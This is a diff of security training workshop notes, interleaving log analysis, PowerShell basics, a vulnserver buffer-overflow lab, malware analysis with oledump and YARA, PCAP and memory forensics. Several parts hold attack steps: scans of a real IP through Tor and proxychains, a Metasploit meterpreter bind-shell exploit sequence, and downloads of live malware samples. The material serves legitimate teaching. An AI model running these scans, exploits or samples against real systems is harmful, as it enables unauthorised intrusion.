strings text | less
708+
709
export LD_PRELOAD=libproxychains.so.3
710
dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
711
-----------------------------------------------------------------------
712-
wget https://pastebin.com/raw/guxzCBmP
712+
713
714
sudo ntpdate pool.ntp.org
715-
cp guxzCBmP am.py
715+
716
tor-resolve strategicsec.com
717
718-
nano am.py
718+
proxychains nmap -sT -p80 204.244.123.113
719
720-
python am.py wannacry.exe
720+
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 204.244.123.113
721
722
723-
##############################################
723+
If you want to block tor exit nodes you get a list from here:
724-
# Log Analysis with Linux command-line tools #
724+
http://rules.emergingthreats.net/blockrules/emerging-tor-BLOCK.rules
725-
##############################################
725+
726-
The following command line executables are found in the Mac as well as most Linux Distributions.
726+
You probably should also block things like:
727
http://rules.emergingthreats.net/blockrules/emerging-rbn-BLOCK.rules			<----- Russian Business Network IPs
728-
cat –  prints the content of a file in the terminal window
728+
http://rules.emergingthreats.net/blockrules/emerging-botcc.rules			<----- BotNet Command and Control Servers
729-
grep – searches and filters based on patterns
729+
http://rules.emergingthreats.net/blockrules/emerging-rbn-malvertisers-BLOCK.rules	<----- Malware Advertisers
730-
awk –  can sort each row into fields and display only what is needed
730+
731-
sed –  performs find and replace functions
731+
Here is where you can download the perl script to automatically update your firewall each day (create a cron job for it).
732-
sort – arranges output in an order
732+
http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules
733-
uniq – compares adjacent lines and can report, filter or provide a count of duplicates
733+
734
735
736
737-
# Cisco Logs #
737+
738
739
740-
AWK Basics
740+
######################
741-
----------
741+
# Simple Exploit Dev #
742-
To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
742+
######################
743
 
744-
-----------------------------Type this-----------------------------------------
744+
- Inside of your Windows7 VM - download the following file to the Desktop:
745-
cat cisco.log | awk '{print $5}' | tail -n 4
745+
https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
746-
-------------------------------------------------------------------------------
746+
747
- Extract this zip file to your Desktop
748
 
749
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
750-
Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
750+
751
- Open a new command prompt and type:
752-
-----------------------------Type this-----------------------------------------
752+
753-
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
753+
754-
-------------------------------------------------------------------------------
754+
755
HELP
756
 
757
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
758-
While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
758+
759
 
760-
-----------------------------Type this-----------------------------------------
760+
761-
cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
761+
762-
-------------------------------------------------------------------------------
762+
763
 
764
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
765
 
766
- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
767-
Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
767+
768
- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
769-
-----------------------------Type this-----------------------------------------
769+
770-
cat cisco.log | grep %LINEPROTO-5-UPDOWN:
770+
771
 
772-
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
772+
773
 
774-
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
774+
775
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
776-
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
776+
777-
--------------------------------------------------------------------------------
777+
778
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
779
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
780-
####################################### 
780+
781-
# Dealing with macro embedded malware #
781+
782-
#######################################
782+
783
 
784
6-jmp-esp.py
785-
---------------------------Type This-----------------------------------
785+
786-
cd ~/malware
786+
787
7-first-exploit
788
- In this script we actually do the stack overflow and launch a bind shell on port 4444
789
 
790
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
791-
 -----------------------------------------------------------------------
791+
792
 
793
------------------------------
794
 
795-
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
795+
cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
796-
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
796+
797
vi vulnserv.rb
798-
---------------------------Type This-----------------------------------
798+
799
 
800
 
801
cd ~/toolz/metasploit
802
 
803
./msfconsole
804-
---------------------------Type This-----------------------------------
804+
805
 
806
 
807-
- Look for "GVhkjbjv" and you should see:
807+
use exploit/windows/misc/vulnserv
808
set PAYLOAD windows/meterpreter/bind_tcp
809
set RHOST 192.168.153.133
810
set RPORT 9999
811
exploit
812
813
814
815
816-
#####################
816+
817-
# Powershell Basics #
817+
# InfoSec Program Development #
818-
#####################
818+
819
Download this file for program development walk-through:
820-
PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
820+
https://s3.amazonaws.com/StrategicSec-Files/Build-InfoSec-Assessment-Capability.zip
821
822-
PowerShell file extension end in .ps1 .
822+
823
824-
An important note is that you cannot double click on a PowerShell script to execute it.
824+
825
826-
To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
826+
827
828-
------------------------Type This------------------------------
828+
829-
cd c:\
829+
# Download the Analysis VM #
830-
dir
830+
831-
cd
831+
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
832
user: malware
833-
---------------------------------------------------------------
833+
pass: malware
834
835
836-
To obtain a list of cmdlets, use the Get-Command cmdlet
836+
- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
837-
------------------------Type This------------------------------
837+
838-
Get-Command
838+
839-
---------------------------------------------------------------
839+
840
cd Desktop/
841
842-
You can use the Get-Alias cmdlet to see a full list of aliased commands.
842+
843-
------------------------Type This------------------------------
843+
844-
Get-Alias
844+
845-
---------------------------------------------------------------
845+
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
846
wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
847
848-
Don't worry you won't blow up your machine with Powershell
848+
849-
------------------------Type This------------------------------
849+
	infected
850-
Get-Process | stop-process              Don't press [ ENTER ] What will this command do?
850+
851-
Get-Process | stop-process -whatif
851+
852-
---------------------------------------------------------------
852+
853
mv malware.exe malware.pdf
854-
To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
854+
855-
------------------------Type This------------------------------
855+
856-
Get-Help Get-Command
856+
857
mv malware.pdf malware.exe
858-
Get-Help Get-Service –online
858+
859
hexdump -n 2 -C malware.exe
860-
Get-Service -Name TermService, Spooler
860+
861
***What is '4d 5a' or 'MZ'***
862-
Get-Service –N BITS
862+
Reference: 
863-
---------------------------------------------------------------
863+
864
 
865
866
objdump -x malware.exe
867
 
868
strings malware.exe
869-
- Run cmdlet through a pie and refer to its properties as $_
869+
870-
------------------------Type This------------------------------
870+
871-
Get-Service | where-object {  $_.Status -eq "Running"}
871+
872-
---------------------------------------------------------------
872+
873
 
874
strings malware.exe | grep -i library
875
876-
- PowerShell variables begin with the $ symbol. First lets create a variable
876+
877-
------------------------Type This------------------------------
877+
878-
$serv = Get-Service –N Spooler
878+
879-
---------------------------------------------------------------
879+
880
strings malware.exe | grep -i hku
881-
To see the value of a variable you can just call it in the terminal.
881+
882-
------------------------Type This------------------------------
882+
							- We didn't see anything like HKLM, HKCU or other registry type stuff
883-
$serv
883+
884
strings malware.exe | grep -i irc
885-
$serv.gettype().fullname
885+
886-
---------------------------------------------------------------
886+
strings malware.exe | grep -i join			
887
888
strings malware.exe | grep -i admin
889-
Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
889+
890-
------------------------Type This------------------------------
890+
891-
$serv | Get-Member
891+
892
893-
Get-Member -InputObject $serv
893+
							- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
894-
---------------------------------------------------------------
894+
895
sudo apt-get install -y python-pefile
896
897
vi analyse_malware.py
898
899-
Let's use a method and a property with our object.
899+
900-
------------------------Type This------------------------------
900+
901-
$serv.Status
901+
902-
$serv.Stop()
902+
903-
$serv.Refresh()
903+
904-
$serv.Status
904+
905-
$serv.Start()
905+
906-
$serv.Refresh()
906+
907-
$serv.Status
907+
908-
---------------------------------------------------------------
908+
909
cd ~/Desktop/malwarescanner
910
911-
If you want some good command-line shortcuts you can check out the following link:
911+
912-
https://technet.microsoft.com/en-us/library/ff678293.aspx
912+
913
unzip master.zip
914
915-
# Simple Event Log Analysis #
915+
916
917-
Let's setup a directory to work in:
917+
918-
------------------------Type This------------------------------
918+
919-
cd c:\
919+
920
921-
mkdir ps
921+
922
923-
cd ps
923+
924-
---------------------------------------------------------------
924+
925
cp ~/Desktop/malware.exe ~/Desktop/malcode
926-
Step 1: Dump the event logs
926+
927-
---------------------------
927+
python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
928-
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
928+
929
cp ~/Desktop/
930-
To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
930+
931-
If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
931+
932-
------------------------Type This------------------------------
932+
933-
Get-EventLog -LogName application | Export-Clixml Applog.xml
933+
934
# Analyzing Macro Embedded Malware                  #
935-
type .\Applog.xml
935+
936
# https://jon.glass/analyzes-dridex-malware-p1/     #
937-
$logs = "system","application","security"
937+
938-
---------------------------------------------------------------
938+
cp ~/Desktop/
939
940
- Create a FREE account on:
941-
The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
941+
https://malwr.com/account/signup/
942-
------------------------Type This------------------------------
942+
943-
$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
943+
- Grab the malware from:
944-
---------------------------------------------------------------
944+
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
945
946
file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
947
948
cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
949-
Step 2: Import the event log of interest
949+
950-
----------------------------------------
950+
951-
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
951+
952-
Store the results in a variable.
952+
953-
Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
953+
954
955-
The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
955+
956-
------------------------Type This------------------------------
956+
957-
$seclog = Import-Clixml security.xml
957+
958
959-
$seclog | select -Last 5
959+
960-
---------------------------------------------------------------
960+
961
unzip oledump_V0_0_22.zip
962-
Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
962+
963-
------------------------Type This------------------------------
963+
cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
964-
Get-EventLog Application -After (Get-Date).AddDays(-1)
964+
965-
---------------------------------------------------------------
965+
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
966-
You can use '-after' and '-before' to filter date ranges
966+
967
python oledump.py 064016.doc
968-
One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
968+
969-
By default, an ordinary user does not have permission to read the security log.
969+
970
971
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams. 
972
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’. 
973
974-
Step 3: Drill into a specific entry
974+
975
python oledump.py 064016.doc -s A5 -v
976-
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
976+
977
- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
978-
------------------------Type This------------------------------
978+
979-
$seclog | select -first 1 | fl *
979+
980-
---------------------------------------------------------------
980+
981
982-
The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
982+
- Look for "GVhkjbjv" and you should see: 
983
984-
------------------------Type This------------------------------
984+
985-
($seclog | select -first 1).message
985+
986
- Take that long blob that starts with 636D and finishes with 653B and paste it in:
987-
(($seclog | select -first 1).message).gettype()
987+
988-
---------------------------------------------------------------
988+
989
990
991-
In the *nix world you often want a count of something (wc -l).
991+
992-
How often is the SeSecurityPrivilege privilege mentioned in the message property?
992+
993-
To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
993+
# Yara Ninja #
994-
------------------------Type This------------------------------
994+
995-
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
995+
sudo apt-get remove -y yara
996-
---------------------------------------------------------------
996+
997-
If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
997+
wget https://github.com/plusvic/yara/archive/v3.4.0.zip
998
999-
------------------------Type This------------------------------
999+
sudo apt-get -y install libtool
1000-
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
1000+
1001-
---------------------------------------------------------------
1001+
unzip v3.4.0.zip
1002
1003-
Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
1003+
cd yara-3.4.0
1004-
Use the count property to determine the total number of entries in the event log.
1004+
1005-
------------------------Type This------------------------------
1005+
./bootstrap.sh
1006-
$seclog.Count
1006+
1007-
---------------------------------------------------------------
1007+
./configure
1008
1009
make
1010
1011
sudo make install
1012
1013
yara -v
1014-
# Simple Log File Analysis #
1014+
1015
cd ..
1016
1017
wget https://github.com/Yara-Rules/rules/archive/master.zip
1018-
You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
1018+
1019
unzip master.zip
1020-
------------------------Type This------------------------------
1020+
1021-
cd c:\ps
1021+
cd ~/Desktop
1022-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
1022+
1023-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
1023+
yara rules-master/packer.yar malcode/malware.exe
1024-
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
1024+
1025-
---------------------------------------------------------------
1025+
1026
Places to get more Yara rules:
1027
------------------------------
1028
https://malwareconfig.com/static/yaraRules/
1029-
The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
1029+
https://github.com/kevthehermit/YaraRules
1030-
------------------------Type This------------------------------
1030+
https://github.com/VectraThreatLab/reyara
1031-
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
1031+
1032-
---------------------------------------------------------------
1032+
1033
1034
Yara rule sorting script:
1035
-------------------------
1036-
To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
1036+
https://github.com/mkayoh/yarasorter
1037-
------------------------Type This------------------------------
1037+
1038-
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
1038+
1039-
---------------------------------------------------------------
1039+
1040
cd ~/Desktop/rules-master
1041
for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
1042-
To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
1042+
1043-
------------------------Type This------------------------------
1043+
yara rules-master/master.yar malcode/malware.exe
1044-
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
1044+
1045-
---------------------------------------------------------------
1045+
1046
1047
1048-
Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
1048+
1049-
------------------------Type This------------------------------
1049+
1050-
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
1050+
1051-
---------------------------------------------------------------
1051+
1052
1053-
In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
1053+
1054-
This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
1054+
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
1055-
------------------------Type This------------------------------
1055+
http://derekmorton.name/files/malware_12-14-12.sql.bz2
1056-
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
1056+
1057-
---------------------------------------------------------------
1057+
1058
Malware Repositories:
1059
http://malshare.com/index.php
1060
http://www.malwareblacklist.com/
1061-
##############################################
1061+
http://www.virusign.com/
1062-
# Parsing Log files using windows PowerShell #
1062+
http://virusshare.com/
1063-
##############################################
1063+
http://www.tekdefense.com/downloads/malware-samples/
1064
1065-
Download the sample IIS log http://pastebin.com/LBn64cyA
1065+
1066
1067-
------------------------Type This------------------------------
1067+
1068-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
1068+
1069
# Creating a Malware Database #
1070-
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}  
1070+
1071-
---------------------------------------------------------------
1071+
1072
Creating a malware database (sqlite)
1073
------------------------------------
1074-
The above command would give us all the WebDAV requests.
1074+
sudo apt-get install -y python-simplejson python-simplejson-dbg
1075
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
1076-
To filter this to a particular user name, use the below command:
1076+
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
1077-
------------------------Type This------------------------------
1077+
1078-
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}  
1078+
	infected
1079-
---------------------------------------------------------------
1079+
python avsubmit.py --init
1080
python avsubmit.py -f malware.exe -e
1081
1082-
Some more options that will be more commonly required :
1082+
1083
1084-
For Outlook Web Access : Replace WebDAV with OWA
1084+
1085
1086-
For EAS : Replace WebDAV with Microsoft-server-activesync
1086+
Creating a malware database (mysql)
1087
-----------------------------------
1088-
For ECP : Replace WebDAV with ECP
1088+
- Step 1: Installing MySQL database
1089
- Run the following command in the terminal:
1090
1091
sudo apt-get install mysql-server
1092
	 
1093
- Step 2: Installing Python MySQLdb module
1094
- Run the following command in the terminal:
1095
1096-
####################################################################
1096+
sudo apt-get build-dep python-mysqldb
1097-
# Windows PowerShell: Extracting Strings Using Regular Expressions #
1097+
sudo apt-get install python-mysqldb
1098-
####################################################################
1098+
1099
Step 3: Logging in 
1100
Run the following command in the terminal:
1101-
Regex Characters you might run into:
1101+
1102
mysql -u root -p					(set a password of 'malware')
1103-
^   Start of string, or start of line in a multiline pattern
1103+
1104-
$   End  of string, or start of line in a multiline pattern
1104+
- Then create one database by running following command:
1105-
\b  Word boundary
1105+
1106-
\d  Digit
1106+
create database malware;
1107-
\   Escape the following character
1107+
1108-
*   0 or more   {3} Exactly 3
1108+
exit;
1109-
+   1 or more   {3,}    3 or more
1109+
1110-
?   0 or 1      {3,5}   3, 4 or 5
1110+
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
1111
1112
vi mal_to_db.py						(fill in database connection information)
1113
1114-
To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1114+
python mal_to_db.py -i
1115
1116-
1) The input file that will be parsed
1116+
python mal_to_db.py -f malware.exe -u
1117-
------------------------Type This------------------------------
1117+
1118-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
1118+
1119-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
1119+
mysql -u root -p
1120-
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
1120+
	malware
1121-
---------------------------------------------------------------
1121+
1122-
2) The regular expression that the input file will be compared against
1122+
mysql> use malware;
1123
1124-
3) The output file for where the extracted data will be placed.
1124+
select id,md5,sha1,sha256,time FROM files;
1125
1126-
Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1126+
mysql> quit;
1127-
Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1127+
1128
1129-
To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1129+
1130-
------------------------Type This------------------------------
1130+
1131-
$input_path = 'c:\ps\emails.txt'
1131+
1132-
$output_file = 'c:\ps\extracted_addresses.txt'
1132+
1133-
$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
1133+
1134-
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1134+
1135-
---------------------------------------------------------------
1135+
cd /home/malware/Desktop/Browser\ Forensics
1136
1137
ls | grep pcap
1138-
In this script, we have the following variables:
1138+
1139
perl chaosreader.pl suspicious-time.pcap
1140-
1) $input_path to hold the path to the input file we want to parse
1140+
1141
firefox index.html
1142-
2) $output_file to hold the path to the file we want the results to be stored in
1142+
1143
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
1144-
3) $regex to hold the regular expression pattern to be used when the strings are being matched.
1144+
1145
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
1146-
The select-string cmdlet contains various parameters as follows:
1146+
1147
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs   
1148-
1) "-Path" which takes as input the full path to the input file
1148+
1149
1150-
2) "-Pattern" which takes as input the regular expression used in the matching process
1150+
for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u
1151
1152-
3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
1152+
1153
1154-
Using ">" the results are written to the destination specified in the $output_file variable.
1154+
1155
1156-
Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1156+
1157
# PCAP Analysis with tshark #
1158-
IP addresses
1158+
1159-
------------
1159+
1160-
For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
1160+
1161-
------------------------Type This------------------------------
1161+
1162-
$input_path = 'c:\ps\ip_addresses.txt'
1162+
1163-
$output_file = 'c:\ps\extracted_ip_addresses.txt'
1163+
1164-
$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
1164+
1165-
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1165+
1166-
---------------------------------------------------------------
1166+
1167
1168
tshark –r suspicious-time.pcap -Tfields -e “eth.src” | sort | uniq
1169
1170-
URLs
1170+
1171-
----
1171+
1172-
For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1172+
1173-
You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1173+
1174-
------------------------Type This------------------------------
1174+
1175-
$input_path = 'c:\ps\URL_addresses.txt'
1175+
1176-
$output_file = 'c:\ps\extracted_URL_addresses.txt'
1176+
1177-
$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
1177+
1178-
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1178+
1179-
---------------------------------------------------------------
1179+
1180
1181-
In addition to the examples above, many other types of strings can be extracted using this script.
1181+
1182-
All you need to do is switch the regular expression in the "$regex" variable!
1182+
1183-
In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1183+
1184
whois sploitme.com.cn
1185
1186
1187
tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' 
1188
1189
tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
1190-
########################################
1190+
1191-
# Basic Network Commands in PowerShell #
1191+
1192-
########################################
1192+
1193
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
1194-
Reference:
1194+
1195-
https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
1195+
1196
1197
1198
1199-
# Pentester Tasks #
1199+
1200
# PCAP Analysis with forensicPCAP.py #
1201-
Reference:
1201+
1202-
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
1202+
cd ~/Desktop
1203
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
1204
sudo easy_install cmd2
1205-
Listing IPs
1205+
1206-
-----------
1206+
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
1207-
One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
1207+
1208
ForPCAP >>> help
1209-
------------------------Type This------------------------------
1209+
1210-
$octect = "149.28.201."
1210+
1211-
$lastoctect = (1..255)
1211+
1212-
$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
1212+
1213-
---------------------------------------------------------------
1213+
1214
1215
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
1216-
Ping Sweep
1216+
1217-
------------------------------------------------------
1217+
1218-
PowerShell provides several methods for doing Ping
1218+
1219-
Test-Connection cmdlet
1219+
1220-
Creation of a WMI Object
1220+
1221-
.Net System.Net.NetworkInformation.Ping Object
1221+
1222-
------------------------------------------------------
1222+
1223
1224
ForPCAP >>> show
1225-
------------------------Type This------------------------------
1225+
1226-
function New-IPRange ($start, $end) {
1226+
1227-
$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
1227+
1228-
[Array]::Reverse($ip1)
1228+
1229-
$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
1229+
1230
1231-
$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
1231+
1232-
[Array]::Reverse($ip2)
1232+
1233-
$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address
1233+
1234
1235-
for ($x=$ip1; $x -le $ip2; $x++) {
1235+
1236-
$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
1236+
1237-
[Array]::Reverse($ip)
1237+
1238-
$ip -join '.'
1238+
1239-
}
1239+
1240-
}
1240+
1241-
$ping = New-Object System.Net.NetworkInformation.Ping
1241+
# Memory Analysis #
1242-
New-IPRange 149.28.201.1 149.28.201.250 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}
1242+
1243-
---------------------------------------------------------------
1243+
cd /home/malware/Desktop/Banking\ Troubles/Volatility
1244
1245
python volatility
1246-
Reverse Lookups
1246+
python volatility pslist -f ../hn_forensics.vmem
1247-
---------------
1247+
python volatility connscan2 -f ../hn_forensics.vmem
1248-
For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry
1248+
python volatility memdmp -p 888 -f ../hn_forensics.vmem
1249
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
1250
				***Takes a few min***
1251-
------Deprecated--------
1251+
strings 1752.dmp | grep "^http://" | sort | uniq
1252-
[System.Net.Dns]::GetHostByAddress("162.243.126.247")  
1252+
strings 1752.dmp | grep "Ahttps://" | uniq -u
1253-
------Deprecated--------
1253+
cd ..
1254
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
1255-
Use getnameinfo instead:
1255+
